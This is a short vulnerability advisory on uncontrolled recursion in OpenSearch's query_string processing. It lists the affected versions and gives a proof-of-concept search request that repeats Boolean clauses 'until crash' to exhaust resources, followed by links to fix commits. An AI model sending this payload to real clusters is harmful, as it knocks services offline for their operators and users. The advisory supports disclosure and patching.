Uncontrolled Recursion Affecting org.opensearch:opensearch package, versions [,2.19.4)[3.0.0-alpha1,3.3.0)

Affected versions of this package are vulnerable to Uncontrolled Recursion via the query_string processing. An attacker can exhaust system resources and disrupt service availability by submitting excessively long Boolean or disjunction queries.

GET _search

{
  "query": {
    "query_string": {
      "query": "winAd AND (rises OR rising) winAd AND (rises OR rising) winAd AND (rises OR rising) winAd AND (rises OR rising)
                      winAd AND (rises OR rising) winAd AND (rises OR rising) winAd AND (rises OR rising) winAd AND (rises OR rising)
                      winAd AND (rises OR rising) winAd AND (rises OR rising) winAd AND (rises OR rising) winAd AND (rises OR rising)
                      winAd AND (rises OR rising) winAd AND (rises OR rising) winAd AND (rises OR rising) winAd AND (rises OR rising)
                      winAd AND (rises OR rising) winAd AND (rises OR rising) winAd AND (rises OR rising) winAd AND (rises OR rising)
                      winAd AND (rises OR rising) winAd AND (rises OR rising)" ... REPEAT UNTIL CRASH
    }
  }
}

• GitHub Commit
• GitHub Commit
• Vulnerability Disclosure